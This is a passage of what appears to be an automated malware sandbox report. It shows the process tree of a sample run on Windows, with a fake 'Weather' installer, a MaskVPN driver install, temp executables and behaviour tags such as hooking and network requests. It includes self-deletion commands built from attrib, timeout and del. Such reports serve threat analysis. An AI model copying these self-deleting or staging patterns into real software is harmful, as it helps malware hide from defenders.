                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                  PID:5700
                                                                                                                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                  PID:6080
                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding B41EC0C359EBDA8C4AA04DA8B7F6450C C
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                    PID:5216
                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding D90B40E486113A5E0E04CCD4727312F8
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                    PID:6132
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:6492
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:8948
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                              PID:9076
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1f0,0x1f4,0x1f8,0x1cc,0x1fc,0x7ffb557b9ec0,0x7ffb557b9ed0,0x7ffb557b9ee0
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                  PID:3188
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1820,17682675594480461640,1174410831004923079,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_466967308" --mojo-platform-channel-handle=1936 /prefetch:8
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:6960
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1820,17682675594480461640,1174410831004923079,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_466967308" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2636 /prefetch:1
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                      PID:7160
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1820,17682675594480461640,1174410831004923079,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_466967308" --mojo-platform-channel-handle=1912 /prefetch:8
                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                        PID:6904
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1820,17682675594480461640,1174410831004923079,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_466967308" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1856 /prefetch:2
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                          PID:6900
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1820,17682675594480461640,1174410831004923079,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_466967308" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2356 /prefetch:2
                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                            PID:4572
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1820,17682675594480461640,1174410831004923079,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_466967308" --mojo-platform-channel-handle=2232 /prefetch:8
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                              PID:8332
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1820,17682675594480461640,1174410831004923079,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_466967308" --mojo-platform-channel-handle=2804 /prefetch:8
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:8872
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1820,17682675594480461640,1174410831004923079,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_466967308" --mojo-platform-channel-handle=2800 /prefetch:8
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                  PID:7144
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1820,17682675594480461640,1174410831004923079,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_466967308" --mojo-platform-channel-handle=1452 /prefetch:8
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                    PID:7784
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1820,17682675594480461640,1174410831004923079,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_466967308" --mojo-platform-channel-handle=2696 /prefetch:8
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                      PID:6028
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE8049.bat" "
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:5628
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                      PID:3912
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                      PID:6420
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                      PID:7312
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE8049.bat"
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                      PID:7340
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE8049.bat" "
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                        PID:7572
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" cls"
                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                          PID:8824
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE8038.bat" "
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:8848
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                            PID:5772
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                            PID:8308
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE8038.bat"
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                            PID:4124
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE8038.bat" "
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                              PID:7844
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" cls"
                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                PID:6440
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                          PID:5520
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                          PID:5384
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                          PID:4856
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:6420
                                                                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                                                            PID:6844
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                            PID:4604
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                            PID:5336
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                            PID:7380
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                            PID:8068
                                                                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                            PID:7180
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                              DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{74984e22-4130-024d-ab35-046c78a1c627}\oemvista.inf" "9" "4d14a44ff" "000000000000017C" "WinSta0\Default" "0000000000000180" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:7940
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                                DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000140"
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                PID:3956
                                                                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:4852
                                                                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                PID:6416
                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                PID:9116
                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                                                  MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                  PID:4200
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\A082.exe
                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\A082.exe
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:8076
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\A49A.exe
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\A49A.exe
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:8796
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\B275.exe
                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\B275.exe
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:5204
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\B275.exe"
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                          PID:6576
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                            timeout /T 10 /NOBREAK
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                            PID:5904
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\BD54.exe
                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\BD54.exe
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:4712
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                              PID:8536
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\CB9D.exe
                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\CB9D.exe
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:9040
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\CB9D.exe
                                                                                                                                                                                                                                                                                                                                                "{path}"
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                  PID:6272
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\CB9D.exe
                                                                                                                                                                                                                                                                                                                                                  "{path}"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                    PID:8116
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\D022.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\D022.exe
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                    PID:4836
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\D795.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\D795.exe
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                      PID:7272
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\D795.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\D795.exe"
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                          PID:4596
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\D795.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\D795.exe"
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                            PID:4412
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                          PID:6384
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                            PID:8520
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                              PID:8032
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                PID:8092
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:6772
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:4580
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:4304
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:6452
